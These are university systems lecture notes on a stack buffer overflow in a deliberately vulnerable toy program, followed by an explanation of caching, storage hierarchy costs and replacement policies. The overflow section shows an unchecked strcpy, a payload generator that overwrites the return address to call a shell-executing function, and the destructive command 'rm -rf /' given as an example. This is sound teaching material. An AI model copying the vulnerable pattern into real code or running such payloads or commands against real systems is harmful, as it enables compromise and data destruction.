Lecture 11: Buffer Overflow, Caching
» Lecture video (Brown ID required)
» Lecture code (Buffer overflow) –
Lecture code (Caching)
» Post-Lecture Quiz (due 11:59pm Tuesday, March 8).
Buffer Overflow, contd.
Consider the code in checksummer.cc. This program computes checksums of strings provided to it as command-line arguments. You don't need to understand in deep detail what it does, but observe that the checksum() function uses a 400-byte stack-allocated buffer (part of the buf union) to hold the input string, which it copies into that buffer.
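A minimal sketch of the vulnerable pattern (not the actual checksummer.cc code; the union member names and the checksum computation itself are illustrative assumptions) might look like this:

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Sketch of the vulnerable pattern, NOT the actual checksummer.cc code: the
// input gets copied into a fixed-size, stack-allocated buffer without any
// length check.
uint32_t checksum(const char* str) {
    union {
        char c[400];       // 400-byte buffer on the stack
        uint32_t i[100];   // the same bytes, viewed as 100 32-bit words
    } buf;
    memset(&buf, 0, sizeof buf);

    strcpy(buf.c, str);    // unchecked copy: writes past buf if strlen(str) >= 400

    uint32_t sum = 0;      // illustrative checksum (XOR of all words); the real
    for (size_t n = 0; n < 100; ++n) {   // program computes something different
        sum ^= buf.i[n];
    }
    return sum;
}
```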
A sane execution of checksummer might look like this:
$ ./checksummer
hey yo CS300
<stdin>: checksum 00796568
But what if the user provides an input string longer than 399 characters (remember that we also need the zero terminator in the buffer)? The function just keeps writing, and it will write over whatever is adjacent to buf on the stack.
From our prior pictures, we know that buf will be in checksum's stack frame, below the entry %rsp. Moreover, directly above the entry %rsp is the return address! In this case, that is an address in main(). So, if checksum writes beyond the end of buf, it will overwrite the return address on the stack; if it keeps going further, it will overwrite data in main's stack frame.
Why is overwriting the return address dangerous? It means that a clever attacker can direct the program to execute any function within the program. In the case of checksummer.cc, note the exec_shell() function, which runs a string as a shell command. This has a lot of nefarious potential – what if we could cause that function to execute with a user-provided string? We could print a lot of sad face emojis to the shell, or, more dangerously, run a command like rm -rf /, which deletes all data on the user's computer!
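The exact implementation of exec_shell() doesn't matter for the attack; a plausible sketch of such a function (assuming it simply hands its argument to the shell, which is not necessarily what the lecture code does) is:

```cpp
#include <cstdlib>

// Plausible sketch of a function like exec_shell() (the lecture code may
// differ): it hands an arbitrary string to the shell for execution.
void exec_shell(const char* cmd) {
    system(cmd);  // runs cmd via /bin/sh -c; "rm -rf /" here would be catastrophic
}
```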
If we run ./checksummer.unsafe (a variant of checksummer with the safety features that modern compilers add to combat these attacks disabled), it behaves as normal with sane strings:
$ ./checksummer.unsafe
hey yo CS300
<stdin>: checksum 00796568
But if we pass a very long string with more than 400 characters, things get a bit more unusual:
$ ./checksummer.unsafe < austen.txt
Segmentation fault (core dumped)
The crash happens because the return address for checksum() was overwritten by garbage from our string, which isn't a valid address. But what if we figure out a valid address and put it in exactly the right place in our string?
This is what the input in attack.bytes does. Specifically, using GDB, I figured out that the address of exec_shell in my compiled version of the code is 0x401156 (an address in the code/text segment of the executable). attack.bytes contains a carefully crafted "payload" that puts the value 0x401156 into the right bytes on the stack. The attack payload is 424 characters long because we need 400 characters to overrun buf, 8 bytes for the base pointer, 4 bytes for the malicious return address, and 12 bytes of extra payload because stack frames on x86-64 Linux are aligned to 16-byte boundaries.
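A sketch of how such a payload could be generated follows; the byte offsets and the address 0x401156 are specific to one particular compiled binary, and this is not how the real attack.bytes was produced:

```cpp
#include <cstdint>
#include <cstdio>
#include <cstring>

// Sketch of generating an attack payload like attack.bytes. The offsets and
// the target address below are assumptions tied to one specific build.
int main() {
    unsigned char payload[424];
    memset(payload, 'A', sizeof payload);            // filler bytes

    // Bytes 0..399 fill up buf; bytes 400..407 overwrite the saved base
    // pointer. The bytes after that land where checksum()'s return address
    // is stored on the stack.
    uint64_t target = 0x401156;                      // address of exec_shell in one build
    memcpy(payload + 408, &target, sizeof target);   // written little-endian on x86-64
    memset(payload + 416, 0, 8);                     // trailing padding up to 424 bytes

    fwrite(payload, 1, sizeof payload, stdout);      // usage: ./gen > attack.bytes
    return 0;
}
```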
Executing this attack works as follows:
$ ./checksummer.unsafe < attack.bytes
OWNED OWNED OWNED
The < attack.bytes syntax simply feeds the contents of the attack.bytes file to the program as its standard input.
Caching and the Storage Hierarchy
We are now switching gears to talk about one of the most important performance-improving concepts in computer systems: the idea of cache memory.
Why are we covering this?
Caching is an immensely important concept to optimize performance of a computer system. As a software engineer in industry, or as a researcher, you will probably find yourself in countless situations where "add a cache" is the answer to a performance problem. Understanding the idea behind caches, as well as when a cache works well, is important to being able to build high-performance applications.
We will look at specific examples of caches, but a generic definition is the following: a cache is a small amount of fast storage used to speed up access to larger, slower storage.
One reasonable question is what we actually mean by "fast storage" and "slow storage", and why we need both. Couldn't we just put all of the data on our computer into fast storage?
To answer this question, it helps to look at what different kinds of storage cost and how this cost has changed over time.
The Storage Hierarchy
When we learn about computer science concepts, we often talk about "cost": the time cost and space cost of algorithms, memory efficiency, and storage space. These costs fundamentally shape the kinds of solutions we build. But financial costs also shape the systems we build, and the costs of the storage technologies we rely on have changed dramatically, as have their capacities and speeds.
The table below gives the price per megabyte of different storage technologies over time, adjusted for inflation (2019 dollars). (Note that flash/SSD storage did not exist until the early 2000s, when the technology became available.)
Year | Memory (DRAM) | Flash/SSD | Hard disk |
---|---|---|---|
~1955 | $411,000,000 | | $9,200 |
1970 | $734,000.00 | | $260.00 |
1990 | $148.20 | | $5.45 |
2003 | $0.09 | $0.305 | $0.00132 |
2010 | $0.019 | $0.00244 | $0.000073 |
2021 | $0.003 | $0.00008 | $0.0000194 |
(Prices due to John C. McCallum, and inflation data from here. $1.00 in 1955 had "the same purchasing power" as $9.62 in 2019 dollars.)
Computer technology is amazing – not just for what it can do, but also for just how tremendously its cost has dropped over the course of just a few decades. The space required to store a modern smartphone photo (3 MB) on a harddisk would have cost tens of thousands of dollars in the 1950s, but now costs a fraction of a cent.
But one fundamental truth has held across all these numbers: primary memory (DRAM) has always been substantially more expensive than long-term disk storage. This becomes even more evident if we normalize all numbers in the table to the cost of 1 MB of harddisk space in 2021, as the second table below does.
Year | Memory (DRAM) | Flash/SSD | Hard disk |
---|---|---|---|
~1955 | 219,800,000,000,000 | | 333,155,000 |
1970 | 39,250,000,000 | | 13,900,000 |
1990 | 7,925,000 | | 291,000 |
2003 | 4,800 | 16,300 | 70 |
2010 | 1,000 | 130 | 3.9 |
2021 | 155 | 4.12 | 1 |
As a consequence of this price differential, computers have always had more persistent disk space than primary memory. Harddisks and flash/SSD storage are persistent (i.e., they survive power failures), while DRAM memory is volatile (i.e., its contents are lost when the computer loses power), but harddisks and flash/SSDs are also much slower to access than memory.
In particular, when thinking about storage performance, we care about the latency to access data in storage. The latency denotes the time until retrieved data is available (for a read), or until the data has reached the storage medium (for a write). A longer latency is worse, and a smaller latency is better, as a smaller latency means that the computer can complete operations sooner.
Another important storage performance metric is throughput (or "bandwidth"), which is the number of operations completed per unit of time. Throughput is often, though not always, the inverse of latency: for example, a device that completes one 60 ns access at a time can serve at most about 16 million accesses per second, but devices that handle many requests in parallel can achieve much higher throughput than the inverse of their latency suggests. An ideal storage medium would have low latency and high throughput, as it takes very little time to complete a request, and many units of data can be transferred per second.
In reality, though, latency generally grows, and throughput drops, as storage media are further and further away from the processor. This is partly due to the storage technologies employed (some, like spinning harddisks, are cheap to manufacture, but slow), and partly due to the inevitable physics of sending information across longer and longer wires.
The table below shows the typical capacity, latency, and throughput achievable with the different storage technologies available in our computers.
Storage type | Capacity | Latency | Throughput (random access) | Throughput (sequential) |
---|---|---|---|---|
Registers | ~30 (100s of bytes) | 0.5 ns | 16 GB/sec (2×10⁹ accesses/sec) | |
SRAM (processor caches) | 5 MB | 4 ns | 1.6 GB/sec (2×10⁸ accesses/sec) | |
DRAM (main memory) | 8 GB | 60 ns | 100 GB/sec | |
SSD (stable storage) | 512 GB | 60 µs | 550 MB/sec | |
Hard disk | 2–5 TB | 4–13 ms | 1 MB/sec | 200 MB/sec |
This notion of larger, cheaper, and slower storage further away from the processor, and smaller, faster, and more expensive storage closer to it, is referred to as the storage hierarchy, as it's possible to neatly rank storage according to these criteria. The storage hierarchy is often depicted as a pyramid, where wider (and lower) entries correspond to larger and slower forms of storage.

This picture includes processor caches, which are small regions of fast (SRAM) memory that are on the processor chip itself. The storage hierarchy shows the processor caches divided into multiple levels, with the L1 cache (sometimes pronounced "level-one cache") closer to the processor than the L2, L3, and L4 caches. This reflects how processor caches are actually laid out, but we often think of a processor cache as a single unit.
Different computers have different sizes and access costs for these hierarchy levels; the ones in the table above are typical. Here are some more concrete numbers, based on Malte's MacBook Air from ca. 2013: a few hundred bytes of registers; ~5 MB of processor cache; 8 GB of primary memory; a 256 GB SSD. The processor cache divides into three levels: 128 KB of total L1 cache, split into four 32 KB components, where each L1 cache is accessed only by a single processor core (which makes it faster, as cores don't need to coordinate); 256 KB of L2 cache; and 4 MB of L3 cache shared by all cores.
Each layer in the storage hierarchy acts as a cache for the following layer.
Finally, consider how the concept of caching abounds in everyday life, too. Imagine how life would differ without, say, fast access to food storage – if every time you felt hungry, you had to walk to a farm and eat a carrot you pulled out of the dirt. Your whole day would be occupied with finding and eating food! (Indeed, this is what some animals spend most of their time doing.) Instead, your refrigerator (or your dorm's refrigerator) acts as a cache for your neighborhood grocery store, and that grocery store acts as a cache for all the food producers worldwide.
Cache Structure
A generic cache is structured as follows.
The fast storage of the cache is divided into fixed-size slots. Each slot can hold data from slow storage, and is at any point in time either empty or occupied by data from slow storage. Each slot has a name (for instance, we might refer to "the first slot" in a cache, or "slot 0"). Slow storage is divided into blocks, which can occupy cache slots (so the cache slot size and the slow storage block size ought to be identical).
Each block on slow storage has an "address" (this is not a memory address! Disks and other storage media have their own addressing schemes). If a cache slot (in fast storage) is full, i.e., if it holds data from a block in slow storage, the cache must also know the address of that block.
In the context of specific levels in the hierarchy, slots and blocks are described by specific terms. For instance, a cache line is a slot in the processor cache (or, sometimes, a block in memory).
Cache Hits and Misses
Read caches must respond to user requests for data at particular addresses. On each access, a cache typically checks whether the specified block is already loaded into a slot. If it is, the cache returns that data; otherwise, the cache first loads the block into some slot, then returns the data from the slot.
A cache access is called a hit if the data accessed is already loaded into a cache slot, and can therefore be accessed quickly, and it's called a miss otherwise. Cache hits are good (they imply fast access), and cache misses are bad: they incur both the cost of accessing the cache and the cost of accessing the slower storage. Ideally, most accesses to the cache should be hits! In other words, we seek a high hit rate, where the hit rate is the fraction of accesses that hit.
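To make these terms concrete, here is a minimal sketch of a generic read cache that counts hits and misses. This is an illustrative software model, not how a hardware cache is implemented; the block size, slot count, and the slow-storage read function are assumptions.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <unordered_map>

// Slow storage is divided into fixed-size blocks, each identified by a block
// address; the cache holds a limited number of them in its slots.
constexpr size_t BLOCK_SIZE = 64;   // bytes per block/slot (illustrative)
constexpr size_t NUM_SLOTS  = 8;    // number of slots in fast storage

using Block = std::array<uint8_t, BLOCK_SIZE>;

// Hypothetical stand-in for fetching one block from slow storage; a real
// system would read from DRAM, an SSD, etc. here.
Block read_block_from_slow_storage(uint64_t block_addr) {
    (void)block_addr;   // unused in this stub
    return Block{};     // dummy data
}

class Cache {
public:
    // Return the block at `block_addr`, loading it from slow storage on a miss.
    const Block& read(uint64_t block_addr) {
        auto it = slots_.find(block_addr);
        if (it != slots_.end()) {
            ++hits_;                  // hit: data is already in a slot
            return it->second;
        }
        ++misses_;                    // miss: must go to slow storage
        if (slots_.size() == NUM_SLOTS) {
            evict_one();              // free up a slot first
        }
        auto res = slots_.emplace(block_addr, read_block_from_slow_storage(block_addr));
        return res.first->second;
    }

    // Fraction of accesses that were hits.
    double hit_rate() const {
        uint64_t total = hits_ + misses_;
        return total == 0 ? 0.0 : double(hits_) / double(total);
    }

private:
    // Evicts an arbitrary resident block; real caches use a smarter
    // replacement policy (see "Cache Replacement" below).
    void evict_one() { slots_.erase(slots_.begin()); }

    std::unordered_map<uint64_t, Block> slots_;  // block address -> cached block
    uint64_t hits_ = 0, misses_ = 0;
};
```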
For example, consider the arrayaccess.cc program. This program generates an in-memory array of integers and then iterates over it, summing the integers, and measures the time to complete this iteration. ./arrayaccess -u -i 1 10000000 runs through the array in linear, increasing order (-u), completes one iteration (-i 1), and uses an array of 10 million integers (ca. 40 MB).
Given that the array is in primary memory (DRAM), how long would we expect this to take? Let's focus on a specific part: the access to the first three integers in the array (i.e., array[0] to array[2]). If we didn't have a cache at all, accessing each integer would incur a latency of 60 ns (the latency of DRAM access). For the first three integers, we'd therefore spend 60 ns + 60 ns + 60 ns = 180 ns.
But we do have the processor caches, which are faster to access than DRAM! They can hold blocks from DRAM in their slots. Since no blocks of the array are in any processor cache at the start of the program, the access to the first integer still goes to DRAM and takes 60 ns. But this access will fetch a whole cache block, which consists of multiple integers, and deposit it into a slot of the L3 processor cache (and, in fact, the L2 and L1, but we will focus this example on the L3 cache). Let's assume the cache slot size is 12 bytes (i.e., three integers) for the example; real cache lines are often on the order of 64 or 128 bytes long. If the first access brings the block into the cache, the subsequent accesses to the second and third integers can read them directly from the cache, which takes about 4 ns per read for the L3 cache. Thus, we end up with a total time of 60 ns + 4 ns + 4 ns = 68 ns, which is much faster than 180 ns.
The principle behind this speedup is called locality of reference. Caching is based on the assumption that if a program accesses a location in memory, it is likely to access this location or an adjacent location again in the future. In many real-world programs, this assumption is a good one, as it is often true. In our example, we have spatial locality of reference, as the access to array[0] is indeed soon followed by accesses to array[1] and array[2], which are already in the cache.
By contrast, a totally random access pattern has no locality of reference, and caching generally does not help much with it. With our arrayaccess program, passing -r changes the access to be entirely random, i.e., we still access each integer, but we do so in a random order. Despite the fact that the program sums just as many integers, it takes much longer (on the order of 10x longer) to run! This is because it does not benefit from caching.
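The notes don't show arrayaccess.cc itself; a rough sketch of what its core might look like (flag handling and timing are simplified, and this is not the actual lecture code) is:

```cpp
#include <algorithm>
#include <chrono>
#include <cstddef>
#include <cstdio>
#include <numeric>
#include <random>
#include <string>
#include <vector>

// Rough sketch of an arrayaccess-style experiment (not the lecture code):
// sum an array of integers in sequential or random order and time the loop.
int main(int argc, char** argv) {
    bool sequential = (argc < 2 || std::string(argv[1]) != "-r");
    size_t n = 10'000'000;                       // ~40 MB of ints

    std::vector<int> array(n, 1);
    std::vector<size_t> order(n);
    std::iota(order.begin(), order.end(), 0);    // 0, 1, 2, ..., n-1
    if (!sequential) {
        std::shuffle(order.begin(), order.end(), std::mt19937(42));
    }

    auto start = std::chrono::steady_clock::now();
    long sum = 0;
    for (size_t idx : order) {
        sum += array[idx];                       // sequential order mostly hits the
    }                                            // cache; random order mostly misses
    auto end = std::chrono::steady_clock::now();

    std::chrono::duration<double> elapsed = end - start;
    printf("sum = %ld, took %.3f s\n", sum, elapsed.count());
    return 0;
}
```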
Cache Replacement
In our nice, linear arrayaccess example, the first access to the array brought the first block into the processor caches. Once the program hits the second block, that will also be brought into the cache, filling another slot, as will the third, etc. But what happens once all cache slots are full? In this situation, the cache needs to throw out an existing block to free up a slot for a new block. This is called cache eviction, and the way the cache decides which slot to free up is called an "eviction policy" or a "replacement policy".
What might a good eviction policy be? We would like the cache to be effective in the future, so ideally we want to avoid evicting a block that we will need shortly after. One option is to always evict the oldest block in the cache, i.e., to cycle through slots as eviction is needed; this is a round-robin, or first-in, first-out (FIFO), policy. Another sensible policy is to evict the cache entry that was least recently accessed; this policy is called least recently used (LRU), and happens to be what most real-world caches use.
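A minimal sketch of LRU bookkeeping (illustrative only; real processor caches implement cheap approximations of LRU in hardware rather than exact list-based LRU) might be:

```cpp
#include <cstdint>
#include <list>
#include <unordered_map>

// Illustrative LRU bookkeeping for a cache's slots: block addresses are kept
// in a list ordered from most recently used (front) to least recently used
// (back).
class LRUTracker {
public:
    // Record an access to `block_addr`, moving it to the front (most recent).
    void touch(uint64_t block_addr) {
        auto it = pos_.find(block_addr);
        if (it != pos_.end()) {
            order_.erase(it->second);          // drop the old position
        }
        order_.push_front(block_addr);
        pos_[block_addr] = order_.begin();
    }

    // Choose a victim: the least recently used block (back of the list).
    uint64_t evict() {
        uint64_t victim = order_.back();
        order_.pop_back();
        pos_.erase(victim);
        return victim;
    }

    bool empty() const { return order_.empty(); }

private:
    std::list<uint64_t> order_;                                  // MRU ... LRU
    std::unordered_map<uint64_t, std::list<uint64_t>::iterator> pos_;
};
```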
But what's the best replacement policy? Intuitively, it is a policy that always evicts the block that will be accessed farthest into the future. This policy is impossible to implement in the real world unless we know the future, but it is provably optimal (no algorithm can do better)! Consequently, this policy is called Bélády's optimal algorithm, named after its discoverer, László Bélády (the article).
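Since Bélády's algorithm needs the entire future access trace, we can only run it offline, e.g., in a simulation. A sketch (illustrative, assuming the whole trace of block addresses is known in advance) is:

```cpp
#include <cstddef>
#include <cstdint>
#include <unordered_set>
#include <vector>

// Sketch of Bélády's optimal replacement: on a miss with a full cache, evict
// the resident block whose next use lies farthest in the future (or that is
// never used again). Requires knowing the full trace, so it is simulation-only.
size_t count_belady_misses(const std::vector<uint64_t>& trace, size_t num_slots) {
    std::unordered_set<uint64_t> cache;
    size_t misses = 0;

    for (size_t i = 0; i < trace.size(); ++i) {
        if (cache.count(trace[i])) continue;   // hit
        ++misses;
        if (cache.size() == num_slots) {
            uint64_t victim = 0;
            size_t farthest = 0;
            for (uint64_t block : cache) {
                size_t next = trace.size();    // "never used again"
                for (size_t j = i + 1; j < trace.size(); ++j) {
                    if (trace[j] == block) { next = j; break; }
                }
                if (next >= farthest) { victim = block; farthest = next; }
            }
            cache.erase(victim);               // evict the farthest-in-future block
        }
        cache.insert(trace[i]);
    }
    return misses;
}
```

Running this on a recorded trace gives a lower bound on the miss count that any realizable policy, including LRU, can be compared against.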
It turns out that processors can sometimes make good guesses at the future, however. Looping linearly over a large array, as we do in ./arrayaccess -u, is such a case. The processor can detect that we are always accessing the neighboring block after the previous one, and it can speculatively bring the next block into the cache while it still works on the summation for the previous block. This speculative loading of blocks into the cache is called prefetching. If it works well, prefetching can remove some of the 60 ns price of the first access to each block, as the block may already be in the cache when we access it!
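Hardware prefetchers do this transparently; purely for illustration, software can also issue prefetch hints explicitly, e.g., via the __builtin_prefetch intrinsic available in GCC and Clang. The lookahead distance of 16 elements below is an arbitrary choice, not something the lecture code does.

```cpp
#include <cstddef>

// Illustrative software prefetching (GCC/Clang builtin): ask the cache to
// start loading data we expect to need a few iterations from now.
long sum_with_prefetch(const int* array, size_t n) {
    long sum = 0;
    for (size_t i = 0; i < n; ++i) {
        if (i + 16 < n) {
            __builtin_prefetch(&array[i + 16]);  // hint: we'll need this soon
        }
        sum += array[i];
    }
    return sum;
}
```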
Summary
Today, we saw an example of a buffer overflow and reviewed the layout of the stack.
We then talked about the notion of caching as a performance optimization at a high level, and we developed our understanding of caches, why they are necessary, and why they benefit performance. We saw that differences in the price of storage technologies create a storage hierarchy with smaller, but faster, storage at the top, and slower, but larger, storage at the bottom. Caches are a way of making the bottom layers appear faster than they actually are!
We then dove deeper into how your processor's cache, a specific instance of the caching paradigm, works and speeds up program execution. We found that accessing data already in the cache (a "hit") is much faster than having to go to the underlying storage to bring the block into the cache (a "miss"). We also considered different algorithms for deciding which slot to free up when the cache is full and a new block needs to be brought in, and found that the widely-used LRU algorithm is a reasonable predictor of future access patterns because of the locality of reference exhibited by typical programs.